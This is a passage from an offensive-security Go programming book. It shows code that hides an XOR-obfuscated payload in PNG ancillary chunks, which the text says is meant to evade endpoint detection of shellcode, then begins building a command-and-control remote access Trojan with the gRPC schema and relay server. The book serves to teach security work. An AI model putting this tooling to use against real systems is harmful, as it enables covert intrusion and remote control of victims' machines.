binary.Read() function u that copies the first 8 bytes from the bytes.Reader into the Header struct value. Recall that you declared the Header struct field as type uint64 (Listing 13-1), which is equivalent to 8 bytes. It’s also noteworthy that the binary package provides methods to read Most Significant Bit and Least Significant Bit formats via binary.BigEndian and binary.LittleEndian, respec- tively v. These functions can also be quite helpful when you’re performing binary writes; for example, you could select BigEndian to place bytes on the wire dictating the use of network byte ordering. The binary endianness function also contains the methods that facili- tate the marshaling of data types to a literal data type (such as uint64). Here, you’re creating a byte array of length 8 and performing a binary read neces- sary to copy the data into a unit64 data type. You can then convert the bytes to their string representations and use slicing and a simple string compari- son to validate that bytes 1 through 4 produce PNG, indicating that you have a valid image file format w. To improve the process of checking that a file is a PNG file, we encour- age you to look at the Go bytes package, as it contains convenience func- tions that you could use as a shortcut to compare a file header with the PNG magic byte sequence we mentioned earlier. We’ll let you explore this on your own. Reading the Chunk Sequence Once you validated that your file is a PNG image, you can write the code that reads the chunk sequence. The header will occur only once in a PNG file, whereas the chunk sequence will repeat the SIZE, TYPE, DATA, and CRC chunks until it reaches the EOF. Therefore, you need to be able to accom- modate this repetition, which you can do most conveniently by using a Go conditional loop. With this in mind, let’s build out a ProcessImage() method, which iteratively processes all the data chunks up to the end of file (Listing 13-5). func (mc *MetaChunk) ProcessImage(b *bytes.Reader, c *models.CmdLineOpts)u { // Snip code for brevity (Only displaying relevant lines from code block) count := 1 //Start at 1 because 0 is reserved for magic byte v chunkType := "" w endChunkType := "IEND" //The last TYPE prior to EOF x for chunkType != endChunkType { fmt.Println("---- Chunk # " + strconv.Itoa(count) + " ----") offset := chk.getOffset(b) fmt.Printf("Chunk Offset: %#02x\n", offset) chk.readChunk(b) 300 Chapter 13 chunkType = chk.chunkTypeToString() count++ } } Listing 13-5: The ProcessImage() method (/ch-13 /imgInject/pnglib/commands.go) You first pass a reference to a bytes.Reader memory address pointer (*bytes.Reader) as an argument to ProcessImage() u. The validate() method (Listing 13-4) you just created also took a reference to a bytes.Reader pointer. As convention dictates, multiple references to the same memory address pointer location will inherently allow mutable access to the referenced data. This essentially means that as you pass your bytes.Reader reference as an argument to ProcessImage(), the reader will have already advanced 8 bytes as a result of the size of the Header because you’re accessing the same instance of bytes.Reader. Alternatively, had you not passed a pointer, the bytes.Reader would have either been a copy of the same PNG image data or separate unique instance data. That’s because advancing the pointer when you read the header would not have advanced the reader appropriately elsewhere. You want to avoid taking this approach. For one, passing around multiple cop- ies of data when unnecessary is simply bad convention. More importantly, each time a copy is passed, it is positioned at the start of the file, forcing you to programmatically define and manage its position in the file prior to reading a chunk sequence. As you progress through the block of code, you define a count variable to track how many chunk segments the image file contains. The chunkType v and endChunkType w are used as part of the comparative logic, which evalu- ates the current chunkType to endChunkType’s IEND value designating an EOF condition x. It would be nice to know where each chunk segment starts—or rather, each chunk’s absolute position within the file byte construct, a value known as the offset. If you know the offset value, it will be much easier to implant a payload into the file. For example, you can give a collection of offset loca- tions to a decoder—a separate function that collects the bytes at each known offset—that then unwinds them into your intended payload. To get the off- sets of each chunk, you’ll call the mc.getOffset(b) method (Listing 13-6). func (mc *MetaChunk) getOffset(b *bytes.Reader) { offset, _ := b.Seek(0, 1)u mc.Offset = offset } Listing 13-6: The getOffset() method (/ch-13 /imgInject/pnglib/commands.go) The bytes.Reader contains a Seek() method that makes deriving the cur- rent position quite simple. The Seek() method moves the current read or write offset and then returns the new offset relative to the start of the file. Hiding Data with Steganography 301 Its first argument is the number of bytes by which you want to move the offset and its second argument defines the position from which the move will occur. The second argument’s optional values are 0 (Start of File), 1 (Current Position), and 2 (End of File). For example, if you wanted to shift 8 bytes to the left from your current position, you would use b.Seek(-8,1). Here, b.Seek(0,1) u states that you want to move your offset 0 bytes from the current position, so it simply returns the current offset: essentially retrieving the offset without moving it. The next methods we detail define how you read the actual chunk segment bytes. To make things a bit more legible, let’s create a readChunk() method and then create separate methods for reading each chunk subfield (Listing 13-7). func (mc *MetaChunk) readChunk(b *bytes.Reader) { mc.readChunkSize(b) mc.readChunkType(b) mc.readChunkBytes(b, mc.Chk.Size) u mc.readChunkCRC(b) } func (mc *MetaChunk) readChunkSize(b *bytes.Reader) { if err := binary.Read(b, binary.BigEndian, &mc.Chk.Size); err != nil { v log.Fatal(err) } } func (mc *MetaChunk) readChunkType(b *bytes.Reader) { if err := binary.Read(b, binary.BigEndian, &mc.Chk.Type); err != nil { log.Fatal(err) } } func (mc *MetaChunk) readChunkBytes(b *bytes.Reader, cLen uint32) { mc.Chk.Data = make([]byte, cLen) w if err := binary.Read(b, binary.BigEndian, &mc.Chk.Data); err != nil { log.Fatal(err) } } func (mc *MetaChunk) readChunkCRC(b *bytes.Reader) { if err := binary.Read(b, binary.BigEndian, &mc.Chk.CRC); err != nil { log.Fatal(err) } } Listing 13-7: Chunk-reading methods (/ch-13 /imgInject/pnglib /commands.go) The methods readChunkSize(), readChunkType(), and readChunkCRC() are all similar. Each reads a uint32 value into the respective field of the Chunk struct. However, readChunkBytes() is a bit of an anomaly. Because the image data is of variable length, we’ll need to supply this length to the readChunkBytes() function so that it knows how many bytes to read u. Recall that the data length is maintained in the SIZE subfield of the chunk. You identify the SIZE value v and pass it as an argument to readChunkBytes() to define a slice of 302 Chapter 13 proper size w. Only then can the byte data be read into the struct’s Data field. That’s about it for reading the data, so let’s press on and explore writ- ing byte data. Writing Image Byte Data to Implant a Payload Although you can choose from many complex steganography techniques to implant payloads, in this section we’ll focus on a method of writing to a certain byte offset. The PNG file format defines critical and ancillary chunk segments within the specification. The critical chunks are necessary for the image decoder to process the image. The ancillary chunks are optional and provide various pieces of metadata that are not critical to encoding or decoding, such as timestamps and text. Therefore, the ancillary chunk type provides an ideal location to either overwrite an existing chunk or insert a new chunk. Here, we’ll show you how to insert new byte slices into an ancillary chunk segment. Locating a Chunk Offset First, you need to identify an adequate offset somewhere in the ancillary data. You can spot ancillary chunks because they always start with lowercase letters. Let’s use the hex editor once again and open up the original PNG file while advancing to the end of the hex dump. Every valid PNG image will have an IEND chunk type indicating the final chunk of the file (the EOF chunk). Moving to the 4 bytes that come before the final SIZE chunk will position you at the starting offset of the IEND chunk and the last of the arbitrary (critical or ancillary) chunks contained within the overall PNG file. Recall that ancillary chunks are optional, so it’s pos- sible that the file you’re inspecting as you follow along won’t have the same ancillary chunks, or any for that matter. In our example, the offset to the IEND chunk begins at byte offset 0x85258 (Figure 13-3). Figure 13-3: Identifying a chunk offset relative to the IEND position Writing Bytes with the ProcessImage() Method A standard approach to writing ordered bytes into a byte stream is to use a Go struct. Let’s revisit another section of the ProcessImage() method we started building in Listing 13-5 and walk through the details. The code in Listing 13-8 calls individual functions that you’ll build out as you progress through this section. Hiding Data with Steganography 303 func (mc *MetaChunk) ProcessImage(b *bytes.Reader, c *models.CmdLineOpts) u { --snip-- v var m MetaChunk w m.Chk.Data = []byte(c.Payload) m.Chk.Type = m.strToInt(c.Type)x m.Chk.Size = m.createChunkSize()y m.Chk.CRC = m.createChunkCRC()z bm := m.marshalData(){ bmb := bm.Bytes() fmt.Printf("Payload Original: % X\n", []byte(c.Payload)) fmt.Printf("Payload: % X\n", m.Chk.Data) | utils.WriteData(b, c, bmb) } Listing 13-8: Writing bytes with the ProcessImage() method (/ch-13/imgInject/pnglib /commands.go) This method takes a byte.Reader and another struct, models.CmdLineOpts, as arguments u. The CmdLineOpts struct, shown in Listing 13-9, contains flag values passed in via the command line. We’ll use these flags to determine what payload to use and where to insert it in the image data. Since the bytes you’ll write follow the same structured format as those read from preexist- ing chunk segments, you can just create a new MetaChunk struct instance v that will accept your new chunk segment values. The next step is to read the payload into a byte slice w. However, you’ll need additional functionality to coerce the literal flag values into a usable byte array. Let’s dive into the details of the strToInt() x, createChunkSize() y, createChunkCRC() z, MarshalData() {, and WriteData() | methods. package models //CmdLineOpts represents the cli arguments type CmdLineOpts struct { Input string Output string Meta bool Suppress bool Offset string Inject bool Payload string Type string Encode bool Decode bool Key string } Listing 13-9: The CmdLineOpts struct (/ch-13 /imgInject/models/opts.go) 304 Chapter 13 The strToInt() Method We’ll start with the strToInt() method (Listing 13-10). func (mc *MetaChunk) strToInt(s string)u uint32 { t := []byte(s) v return binary.BigEndian.Uint32(t) } Listing 13-10: The strToInt() method (/ch-13 /imgInject/pnglib/commands.go) The strToInt() method is a helper that consumes a string u as an argu- ment and returns uint32 v, which is the necessary data type for your Chunk struct TYPE value. The createChunkSize() Method Next, you use the createChunkSize() method to assign the Chunk struct SIZE value (Listing 13-11). func (mc *MetaChunk) createChunkSize() uint32 { return uint32(len(mc.Chk.Data)v)u } Listing 13-11: The createChunkSize() method (/ch-13 /imgInject/pnglib/commands.go) This method will obtain the length of the chk.DATA byte array v and type-convert it to a uint32 value u. The createChunkCRC() Method Recall that the CRC checksum for each chunk segment comprises both the TYPE and DATA bytes. You’ll use the createChunkCRC() method to calculate this checksum. The method leverages Go’s hash/crc32 package (Listing 13-12). func (mc *MetaChunk) createChunkCRC() uint32 { bytesMSB := new(bytes.Buffer) u if err := binary.Write(bytesMSB, binary.BigEndian, mc.Chk.Type); err != nil { v log.Fatal(err) } if err := binary.Write(bytesMSB, binary.BigEndian, mc.Chk.Data); err != nil { w log.Fatal(err) } return crc32.ChecksumIEEE(bytesMSB.Bytes()) x } Listing 13-12: The createChunkCRC() method (/ch-13/imgInject/pnglib /commands.go) Prior to arriving at the return statement, you declare a bytes.Buffer u and write both the TYPE v and DATA w bytes into it. The byte slice from the buffer is then passed as an argument to the ChecksumIEEE, and the CRC-32 Hiding Data with Steganography 305 checksum value is returned as a uint32 data type. The return statement x is doing all the heavy lifting here, actually calculating the checksum on the necessary bytes. The marshalData() Method All necessary pieces of a chunk are assigned to their respective struct fields, which can now be marshaled into a bytes.Buffer. This buffer will provide the raw bytes of the custom chunk that are to be inserted into the new image file. Listing 13-13 shows what the marshalData() method looks like. func (mc *MetaChunk) marshalData() *bytes.Buffer { bytesMSB := new(bytes.Buffer) u if err := binary.Write(bytesMSB, binary.BigEndian, mc.Chk.Size); err != nil { v log.Fatal(err) } if err := binary.Write(bytesMSB, binary.BigEndian, mc.Chk.Type); err != nil { w log.Fatal(err) } if err := binary.Write(bytesMSB, binary.BigEndian, mc.Chk.Data); err != nil { x log.Fatal(err) } if err := binary.Write(bytesMSB, binary.BigEndian, mc.Chk.CRC); err != nil { y log.Fatal(err) } return bytesMSB } Listing 13-13: The marshalData() method (/ch-13/imgInject/pnglib /commands.go) The marshalData() method declares a bytes.Buffer u and writes the chunk information to it, including the size v, type w, data x, and check- sum y. The method returns all the chunk segment data into a single con- solidated bytes.Buffer. The WriteData() Function Now all you have left to do is to write your new chunk segment bytes into the offset of the original PNG image file. Let’s have a peek at the WriteData() function, which exists in a package we created named utils (Listing 13-14). //WriteData writes new Chunk data to offset func WriteData(r *bytes.Readeru, c *models.CmdLineOptsv, b []bytew) { x offset, _ := strconv.ParseInt(c.Offset, 10, 64) y w, err := os.Create(c.Output) if err != nil { log.Fatal("Fatal: Problem writing to the output file!") } defer w.Close() z r.Seek(0, 0) 306 Chapter 13 { var buff = make([]byte, offset) r.Read(buff) | w.Write(buff) } w.Write(b) ~ _, err = io.Copy(w, r) if err == nil { fmt.Printf("Success: %s created\n", c.Output) } } Listing 13-14: The WriteData() function (/ch-13 /imgInject/utils/writer.go) The WriteData() function consumes a bytes.Reader u containing the original image file byte data, a models.CmdLineOpts v struct inclusive of the command line argument values, and a byte slice w holding the new chunk byte segment. The code block starts with a string-to-int64 conversion x in order to obtain the offset value from the models.CmdLineOpts struct; this will help you write your new chunk segment to a specific location without cor- rupting other chunks. You then create a file handle y so that the newly modified PNG image can be written to disk. You use the r.Seek(0,0) function call z to rewind to the absolute begin- ning of the bytes.Reader. Recall that the first 8 bytes are reserved for the PNG header, so it’s important that the new output PNG image include these header bytes as well. You include them by instantiating a byte slice with a length determined by the offset value {. You then read that number of bytes from the original image and write those same bytes to your new image file |. You now have identical headers in both the original and new images. You then write the new chunk segment bytes } into the new image file. Finally, you append the remainder of the bytes.Reader bytes ~ (that is, the chunk segment bytes from your original image) to the new image file. Recall that bytes.Reader has advanced to the offset location, because of the earlier read into a byte slice, which contains bytes from the offset to the EOF. You’re left with a new image file. Your new file has identical leading and trailing chunks as the original image, but it also contains your payload, injected as a new ancillary chunk. To help visualize a working representation of what you built so far, reference the overall working project code at https://github.com/blackhat-go /bhg/tree/master/ch-13/imgInject/. The imgInject program consumes command line arguments containing values for the original PNG image file, an offset location, an arbitrary data payload, the self-declared arbitrary chunk type, and the output filename for your modified PNG image file, as shown in Listing 13-15. $ go run main.go -i images/battlecat.png -o newPNGfile --inject –offset \ 0x85258 --payload 1234243525522552522452355525 Listing 13-15: Running the imgInject command line program Hiding Data with Steganography 307 If everything went as planned, offset 0x85258 should now contain a new rNDm chunk segment, as shown in Figure 13-4. Figure 13-4: A payload injected as an ancillary chunk (such as rNDm) Congratulations—you’ve just written your first steganography program! Encoding and Decoding Image Byte Data by Using XOR Just as there are many types of steganography, so are there many tech- niques used to obfuscate data within a binary file. Let’s continue to build the sample program from the previous section. This time, you’ll include obfuscation to hide the true intent of your payload. Obfuscation can help conceal your payload from network-monitoring devices and endpoint security solutions. If, for example, you’re embedding raw shellcode used for spawning a new Meterpreter shell or Cobalt Strike beacon, you want to make sure it avoids detection. For this, you’ll use Exclusive OR bitwise operations to encrypt and decrypt the data. An Exclusive OR (XOR) is a conditional comparison between two binary values that produces a Boolean true value if and only if the two values are not the same, and a Boolean false value otherwise. In other words, the statement is true if either x or y are true—but not if both are true. You can see this rep- resented in Table 13-1, given that x and y are both binary input values. Table 13-1: XOR Truth Table x y x ^ y output 0 1 True or 1 1 0 True or 1 0 0 False or 0 1 1 False or 0 You can use this logic to obfuscate data by comparing the bits in the data to the bits of a secret key. When two values match, you change the bit in the payload to 0, and when they differ, you change it to 1. Let’s expand the code you created in the previous section to include an encodeDecode() function, along with XorEncode() and XorDecode() functions. We’ll insert these functions into the utils package (Listing 13-16). 308 Chapter 13 func encodeDecode(input []byteu, key stringv) []byte { w var bArr = make([]byte, len(input)) for i := 0; i < len(input); i++ { x bArr[i] += input[i] ^ key[i%len(key)] } return bArr } Listing 13-16: The encodeDecode() function (/ch-13 /imgInject/utils/encoders.go) The encodeDecode() function consumes a byte slice containing the pay- load u and a secret key value v as arguments. A new byte slice, bArr w, is created within the function’s inner scope and initialized to the input byte length value (the length of the payload). Next, the function uses a condi- tional loop to iterate over each index position of input byte array. Within the inner conditional loop, each iteration XORs the current index’s binary value with a binary value derived from the modulo of the current index value and length of the secret key x. This allows you to use a key that is shorter than your payload. When the end of the key is reached, the modulo will force the next iteration to use the first byte of the key. Each XOR operation result is written to the new bArr byte slice, and the function returns the resulting slice. The functions in Listing 13-17 wrap the encodeDecode() function to facili- tate the encoding and decoding process. // XorEncode returns encoded byte array u func XorEncode(decode []byte, key string) []byte { v return encodeDecode(decode, key) } // XorDecode returns decoded byte array u func XorDecode(encode []byte, key string) []byte { v return encodeDecode(encode, key) } Listing 13-17: The XorEncode() and XorDecode() functions (/ch-13/imgInject/utils /encoders.go) You define two functions, XorEncode() and XorDecode(), which take the same literal arguments u and return the same values v. That’s because you decode XOR-encoded data by using the same process used to encode the data. However, you define these functions separately, to provide clarity within the program code. To use these XOR functions in your existing program, you’ll have to modify the ProcessImage() logic you created in Listing 13-8. These updates will leverage the XorEncode() function to encrypt the payload. The modifi- cations, shown in Listing 13-18, assume you’re using command line argu- ments to pass values to conditional encode and decode logic. Hiding Data with Steganography 309 // Encode Block if (c.Offset != "") && c.Encode { var m MetaChunk u m.Chk.Data = utils.XorEncode([]byte(c.Payload), c.Key) m.Chk.Type = chk.strToInt(c.Type) m.Chk.Size = chk.createChunkSize() m.Chk.CRC = chk.createChunkCRC() bm := chk.marshalData() bmb := bm.Bytes() fmt.Printf("Payload Original: % X\n", []byte(c.Payload)) fmt.Printf("Payload Encode: % X\n", chk.Data) utils.WriteData(b, c, bmb) } Listing 13-18: Updating ProcessImage() to include XOR encoding (/ch-13/imgInject /pnglib/commands.go) The function call to XorEncode() u passes a byte slice containing the pay- load and secret key, XORs the two values, and returns a byte slice, which is assigned to chk.Data. The remaining functionality remains unchanged and marshals the new chunk segment to eventually be written to an image file. The command line run of your program should produce a result simi- lar to the one in Listing 13-19. $ go run main.go -i images/battlecat.png --inject --offset 0x85258 --encode \ --key gophers --payload 1234243525522552522452355525 --output encodePNGfile Valid PNG so let us continue! u Payload Original: 31 32 33 34 32 34 33 35 32 35 35 32 32 35 35 32 35 32 32 34 35 32 33 35 35 35 32 35 v Payload Encode: 56 5D 43 5C 57 46 40 52 5D 45 5D 57 40 46 52 5D 45 5A 57 46 46 55 5C 45 5D 50 40 46 Success: encodePNGfile created Listing 13-19: Running the imgInject program to XOR encode a data chunk block The payload is written to a byte representation and displayed to stdout as Payload Original u. The payload is then XORed with a key value of gophers and displayed to stdout as Payload Encode v. To decrypt your payload bytes, you use the decode function, as in Listing 13-20. //Decode Block if (c.Offset != "") && c.Decode { var m MetaChunk u offset, _ := strconv.ParseInt(c.Offset, 10, 64) v b.Seek(offset, 0) w m.readChunk(b) origData := m.Chk.Data x m.Chk.Data = utils.XorDecode(m.Chk.Data, c.Key) m.Chk.CRC = m.createChunkCRC() y bm := m.marshalData() 310 Chapter 13 bmb := bm.Bytes() fmt.Printf("Payload Original: % X\n", origData) fmt.Printf("Payload Decode: % X\n", m.Chk.Data) z utils.WriteData(b, c, bmb) } Listing 13-20: Decoding the image file and payload (/ch-13/imgInject/pnglib /commands.go) The block requires the offset position of the chunk segment that con- tains the payload u. You use the offset to Seek() v the file position, along with a subsequent call to readChunk() w that’s necessary to derive the SIZE, TYPE, DATA, and CRC values. A call to XorDecode() x takes the chk.Data payload value and the same secret key used to encode the data, and then assigns the decoded payload value back to chk.Data. (Remember that this is symmetric encryption, so you use the same key to both encrypt and decrypt the data.) The code block continues by calling marshalData() y, which converts your Chunk struct to a byte slice. Finally, you write the new chunk segment contain- ing the decoded payload to a file by using the WriteData() function z. A command line run of your program, this time with a decode argu- ment, should produce the result in Listing 13-21. $ go run main.go -i encodePNGfile -o decodePNGfile --offset 0x85258 –decode \ --key gophersValid PNG so let us continue! u Payload Original: 56 5D 43 5C 57 46 40 52 5D 45 5D 57 40 46 52 5D 45 5A 57 46 46 55 5C 45 5D 50 40 46 v Payload Decode: 31 32 33 34 32 34 33 35 32 35 35 32 32 35 35 32 35 32 32 34 35 32 33 35 35 35 32 35 Success: decodePNGfile created Listing 13-21: Running the imgInject program to XOR decode a data chunk block The Payload Original value u is the encoded payload data read from the original PNG file, while the Payload Decode value v is the decrypted payload. If you compare your sample command line run from before and the output here, you’ll notice that your decoded payload matches the original, cleartext value you supplied originally. There is a problem with the code, though. Recall that the program code injects your new decoded chunk at an offset position of your specification. If you have a file that already contains the encoded chunk segment and then attempt to write a new file with a decoded chunk segment, you’ll end up with both chunks in the new output file. You can see this in Figure 13-5. Figure 13-5: The output file contains both the decoded chunk segment and encoded chunk segment. Hiding Data with Steganography 311 To understand why this happens, recall that the encoded PNG file has the encoded chunk segment at offset 0x85258, as shown in Figure 13-6. Figure 13-6: The output file containing the encoded chunk segment The problem presents itself when the decoded data is written to off- set 0x85258. When the decoded data gets written to the same location as the encoded data, our implementation doesn’t delete the encoded data; it merely shifts the remainder of the file bytes to the right, including the encoded chunk segment, as illustrated previously in Figure 13-5. This can complicate payload extraction or produce unintended consequences, such as revealing the cleartext payload to network devices or security software. Fortunately, this issue is quite easy to resolve. Let’s take a look at our previous WriteData() function. This time, you can modify it to address the problem (Listing 13-22). //WriteData writes new data to offset func WriteData(r *bytes.Reader, c *models.CmdLineOpts, b []byte) { offset, err := strconv.ParseInt(c.Offset, 10, 64) if err != nil { log.Fatal(err) } w, err := os.OpenFile(c.Output, os.O_RDWR|os.O_CREATE, 0777) if err != nil { log.Fatal("Fatal: Problem writing to the output file!") } r.Seek(0, 0) var buff = make([]byte, offset) r.Read(buff) w.Write(buff) w.Write(b) u if c.Decode { v r.Seek(int64(len(b)), 1) } w _, err = io.Copy(w, r) if err == nil { fmt.Printf("Success: %s created\n", c.Output) } } Listing 13-22: Updating WriteData() to prevent duplicate ancillary chunk types (/ch-13 /imgInject/utils/writer.go) You introduce the fix with the c.Decode conditional logic u. The XOR operation produces a byte-for-byte transaction. Therefore, the encoded and decoded chunk segments are identical in length. Furthermore, the 312 Chapter 13 bytes.Reader will contain the remainder of the original encoded image file at the moment the decoded chunk segment is written. So, you can perform a right byte shift comprising the length of the decoded chunk segment on the bytes.Reader v, advancing the bytes.Reader past the encoded chunk seg- ment and writing the remainder of bytes to your new image file w. Voila! As you can see in Figure 13-7, the hex editor confirms that you resolved the problem. No more duplicate ancillary chunk types. Figure 13-7: The output file without duplicate ancillary data The encoded data no longer exists. Additionally, running ls -la against the files should produce identical file lengths, even though file bytes have changed. Summary In this chapter, you learned how to describe the PNG image file format as a series of repetitive byte chunk segments, each with its respective purpose and applicability. Next, you learned methods of reading and navigating the binary file. Then you created byte data and wrote it to an image file. Finally, you used XOR encoding to obfuscate your payload. This chapter focused on image files and only scratched the surface of what you can accomplish by using steganography techniques. But you should be able to apply what you learned here to explore other binary file types. Additional Exercises Like many of the other chapters in this book, this chapter will provide the most value if you actually code and experiment along the way. Therefore, we want to conclude with a few challenges to expand on the ideas already covered: 1. While reading the XOR section, you may have noticed that the XorDecode() function produces a decoded chunk segment, but never updates the CRC checksum. See if you can correct this issue. 2. The WriteData() function facilitates the ability to inject arbitrary chunk segments. What code changes would you have to make if you wanted to overwrite existing ancillary chunk segments? If you need help, our explanation about byte shifting and the Seek() function may be useful in solving this problem. Hiding Data with Steganography 313 3. Here’s a more challenging problem: try to inject a payload—the PNG DATA byte chunk—by distributing it throughout various ancillary chunk segments. You could do this one byte at a time, or with multiple group- ings of bytes, so get creative. As an added bonus, create a decoder that reads exact payload byte offset locations, making it easier to extract the payload. 4. The chapter explained how to use XOR as a confidentiality technique—a method to obfuscate the implanted payload. Try to implement a different technique, such as AES encryption. Go core packages provide a number of possibilities (see Chapter 11 if you need a refresher). Observe how the solution affects the new image. Does it cause the overall size to increase, and if so, by how much? 5. Use the code ideas within this chapter to expand support for other image file formats. Other image specifications may not be as organized as PNG. Want proof? Give the PDF specification a read, as it can be rather intimidating. How would you solve the challenges of reading and writing data to this new image format? 14 BU IL DING A CO M M A N D - A N D - CON T ROL R AT In this chapter, we’ll tie together several lessons from the previous chapters to build a basic command and control (C2) remote access Trojan (RAT). A RAT is a tool used by attackers to remotely perform actions on a compro­ mised victim’s machine, such as accessing the file­ system, executing code, and sniffing network traffic. Building this RAT requires building three separate tools: a client implant, a server, and an admin component. The client implant is the portion of the RAT that runs on a compromised workstation. The server is what will interact with the client implant, much like the way Cobalt Strike’s team server—the server component of the widely used C2 tool—sends commands to compro­ mised systems. Unlike the team server, which uses a single service to facili­ tate server and administrative functions, we’ll create a separate, stand­alone admin component used to actually issue the commands. This server will act as the middleman, choreographing communications between compromised systems and the attacker interacting with the admin component. 316 Chapter 14 There are an infinite number of ways to design a RAT. In this chapter, we aim to highlight how to handle client and server communications for remote access. For this reason, we’ll show you how to build something simple and unpolished, and then prompt you to create significant improvements that should make your specific version more robust. These improvements, in many cases, will require you to reuse content and code examples from previ­ ous chapters. You’ll apply your knowledge, creativity, and problem­solving ability to enhance your implementation. Getting Started To get started, let’s review what we’re going to do: we’ll create a server that receives work in the form of operating system commands from an admin component (which we’ll also create). We’ll create an implant that polls the server periodically to look for new commands and then publishes the com­ mand output back onto the server. The server will then hand that result back to the administrative client so that the operator (you) can see the output. Let’s start by installing a tool that will help us handle all these network interactions and reviewing the directory structure for this project. Installing Protocol Buffers for Defining a gRPC API We’ll build all the network interactions by using gRPC, a high­performance remote procedure call (RPC) framework created by Google. RPC frame­ works allow clients to communicate with servers over standard and defined protocols without having to understand any of the underlying details. The gRPC framework operates over HTTP/2, communicating messages in a highly efficient, binary structure. Much like other RPC mechanisms, such as REST or SOAP, our data structures need to be defined in order to make them easy to serialize and deserialize. Luckily for us, there’s a mechanism for defining our data and API functions so we can use them with gRPC. This mechanism, Protocol Buffers (or Protobuf, for short), includes a standard syntax for API and complex data definitions in the form of a .proto file. Tooling exists to com­ pile that definition file into Go­friendly interface stubs and data types. In fact, this tooling can produce output in a variety of languages, meaning you can use the .proto file to generate C# stubs and types. Your first order of business is to install the Protobuf compiler on your system. Walking through the installation is outside the scope of this book, but you’ll find full details under the “Installation” section of the official Go Protobuf repository at https://github.com/golang/protobuf/. Also, while you’re at it, install the gRPC package with the following command: > go get -u google.golang.org/grpc Building a Command-and-Control RAT 317 Creating the Project Workspace Next, let’s create our project workspace. We’ll create four subdirectories to account for the three components (the implant, server, and admin compo­ nent) and the gRPC API definition files. In each of the component direc­ tories, we’ll create a single Go file (of the same name as the encompassing directory) that’ll belong to its own main package. This lets us independently compile and run each as a stand­alone component and will create a descrip­ tive binary name in the event we run go build on the component. We’ll also create a file named implant.proto in our grpcapi directory. That file will hold our Protobuf schema and gRPC API definitions. Here’s the directory struc­ ture you should have: $ tree . |-- client | |-- client.go |-- grpcapi | |-- implant.proto |-- implant | |-- implant.go |-- server |-- server.go With the structure created, we can begin building our implementation. Throughout the next several sections, we’ll walk you through the contents of each file. Defining and Building the gRPC API The next order of business is to define the functionality and data our gRPC API will use. Unlike building and consuming REST endpoints, which have a fairly well­defined set of expectations (for example, they use HTTP verbs and URL paths to define which action to take on which data), gRPC is more arbitrary. You effectively define an API service and tie to it the function proto­ types and data types for that service. We’ll use Protobufs to define our API. You can find a full explanation of the Protobuf syntax with a quick Google search, but we’ll briefly explain it here. At a minimum, we’ll need to define an administrative service used by operators to send operating system commands (work) to the server. We’ll also need an implant service used by our implant to fetch work from the server and send the command output back to the server. Listing 14­1 shows the contents of the implant.proto file. (All the code listings at the root location of / exist under the provided github repo https://github.com/blackhat-go/bhg/.) //implant.proto syntax = "proto3"; u package grpcapi; 318 Chapter 14 // Implant defines our C2 API functions v service Implant { rpc FetchCommand (Empty) returns (Command); rpc SendOutput (Command) returns (Empty); } // Admin defines our Admin API functions w service Admin { rpc RunCommand (Command) returns (Command); } // Command defines a with both input and output fields x message Command { string In = 1; string Out = 2; } // Empty defines an empty message used in place of null y message Empty { } Listing 14-1: Defining the gRPC API by using Protobuf (/ch-14/grpcapi/implant.proto) Recall how we intend to compile this definition file into Go­specific artifacts? Well, we explicitly include package grpcapi u to instruct the com­ piler that we want these artifacts created under the grpcapi package. The name of this package is arbitrary. We picked it to ensure that the API code remains separate from the other components. Our schema then defines a service named Implant and a service named Admin. We’re separating these because we expect our Implant component to interact with our API in a different manner than our Admin client. For example, we wouldn’t want our Implant sending operating system command work to our server, just as we don’t want to require our Admin component to send command output to the server. We define two methods on the Implant service: FetchCommand and Send Output v. Defining these methods is like defining an interface in Go. We’re saying that any implementation of the Implant service will need to imple­ ment those two methods. FetchCommand, which takes an Empty message as a parameter and returns a Command message, will retrieve any outstand­ ing operating system commands from the server. SendOutput will send a Command message (which contains command output) back to the server. These messages, which we’ll cover momentarily, are arbitrary, complex data structures that contain fields necessary for us to pass data back and forth between our endpoints. Our Admin service defines a single method: RunCommand, which takes a Command message as a parameter and expects to read a Command message back w. Its intention is to allow you, the RAT operator, to run an operating system command on a remote system that has a running implant. Building a Command-and-Control RAT 319 Lastly, we define the two messages we’ll be passing around: Command and Empty. The Command message contains two fields, one used for maintaining the operating system command itself (a string named In) and one used for maintaining the command output (a string named Out) x. Note that the message and field names are arbitrary, but that we assign each field a numerical value. You might be wondering how we can assign In and Out numerical values if we defined them to be strings. The answer is that this is a schema definition, not an implementation. Those numerical values repre­ sent the offset within the message itself where those fields will appear. We’re saying In will appear first, and Out will appear second. The Empty message contains no fields y. This is a hack to work around the fact that Protobuf doesn’t explicitly allow null values to be passed into or returned from an RPC method. Now we have our schema. To wrap up the gRPC definition, we need to compile the schema. Run the following command from the grpcapi directory: > protoc -I . implant.proto --go_out=plugins=grpc:./ This command, which is available after you complete the initial instal­ lation we mentioned earlier, searches the current directory for the Protobuf file named implant.proto and produces Go­specific output in the current directory. Once you execute it successfully, you should have a new file named implant.pb.go in your grpcapi directory. This new file contains the interface and struct definitions for the services and messages created in the Protobuf schema. We’ll leverage this for building our server, implant, and admin component. Let’s build these one by one. Creating the Server Let’s start with the server, which will accept commands from the admin client and polling from the implant. The server will be the most complicated of the components, since it’ll need to implement both the Implant and Admin services. Plus, since it’s acting as a middleman between the admin component and implant, it’ll need to proxy and manage messages coming to and from each side. Implementing the Protocol Interface Let’s first look at the guts of our server in server/server.go (Listing 14­2). Here, we’re implementing the interface methods necessary for the server to read and write commands from and to shared channels. u type implantServer struct { work, output chan *grpcapi.Command } 320 Chapter 14 type adminServer struct { work, output chan *grpcapi.Command } v func NewImplantServer(work, output chan *grpcapi.Command) *implantServer { s := new(implantServer) s.work = work s.output = output return s } func NewAdminServer(work, output chan *grpcapi.Command) *adminServer { s := new(adminServer) s.work = work s.output = output return s } w func (s *implantServer) FetchCommand(ctx context.Context, \ empty *grpcapi.Empty) (*grpcapi.Command, error) { var cmd = new(grpcapi.Command) x select { case cmd, ok := <-s.work: if ok { return cmd, nil } return cmd, errors.New("channel closed") default: // No work return cmd, nil } } y func (s *implantServer) SendOutput(ctx context.Context, \ result *grpcapi.Command) (*grpcapi.Empty, error) { s.output <- result return &grpcapi.Empty{}, nil } z func (s *adminServer) RunCommand(ctx context.Context, cmd *grpcapi.Command) \ (*grpcapi.Command, error) { var res *grpcapi.Command go func() { s.work <- cmd }() res = <-s.output return res, nil } Listing 14-2: Defining the server types (/ch-14/server /server.go) To serve our admin and implant APIs, we need to define server types that implement all the necessary interface methods. This is the only way Building a Command-and-Control RAT 321 we can start 